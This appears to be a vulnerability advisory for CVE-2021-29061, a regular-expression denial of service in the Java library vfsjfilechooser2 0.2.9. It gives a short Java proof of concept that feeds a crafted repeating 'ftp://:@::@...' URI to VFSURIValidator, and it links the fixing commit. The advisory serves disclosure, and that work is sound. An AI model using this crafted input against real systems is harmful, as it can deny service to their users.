CVE-2021-29061
Package
vfsjfilechooser2
Overview
vfsjfilechooser2 is a mavenized fork of the dormant vfsjfilechooser project on sf.net
Regular Expression Denial of Service (ReDOS) in Vfsjfilechooser2 version 0.2.9.
It allows cause a denial of service when validating crafted invalid uris.
Proof of Concept
import com.googlecode.vfsjfilechooser2.utils.VFSURIValidator;
public class Main {
public static void main(String[] args) {
VFSURIValidator v = new VFSURIValidator();
String _uri = "ftp://:@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::";
System.out.println(v.isValid(_uri));
}
}GitHub Commit
https://github.com/fracpete/vfsjfilechooser2/commit/9c9f2c317f3de5ece60a3ae28c371e9796e3909b